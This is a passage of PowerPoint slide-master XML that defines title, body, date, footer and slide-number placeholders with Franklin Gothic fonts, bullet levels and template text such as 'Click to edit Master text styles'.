              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1391400"/>
            <a:ext cx="5194440" cy="4469040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:norm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Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>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1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="900000" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="124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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="160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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6415920" y="1391400"/>
            <a:ext cx="5194440" cy="4469040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:norm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Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>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1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="900000" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="124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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="160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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="14"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="15"/>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62" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="16"/>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170BA050-B0E7-48E6-B8DC-DFB0EA27B957}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN"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6"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67"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68"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pic>
        <p:nvPicPr>
          <p:cNvPr id="69"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70" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="729720"/>
            <a:ext cx="11029320" cy="987840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="2250720"/>
            <a:ext cx="5194440" cy="557280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="2926080"/>
            <a:ext cx="5194440" cy="2934720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="t">
            <a:norm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Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>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1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="900000" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="124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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="160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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6415920" y="2250720"/>
            <a:ext cx="5194440" cy="552960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6415920" y="2926080"/>
            <a:ext cx="5194440" cy="2934720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="t">
            <a:norm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Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>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1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="900000" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="124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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="160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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="17"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="18"/>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77" name="PlaceHolder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="19"/>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6326C2DC-F291-4DFD-9E1A-8361E1EB06A3}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN"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8"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79"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80"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pic>
        <p:nvPicPr>
          <p:cNvPr id="81"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82" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576000" y="729720"/>
            <a:ext cx="11029320" cy="591840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="20"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="21"/>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85" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="22"/>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1F7539D2-5ABB-4D37-89E9-2BA9BF07F0B2}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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10000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1296000" indent="-288000">
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1728000" indent="-216000">
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
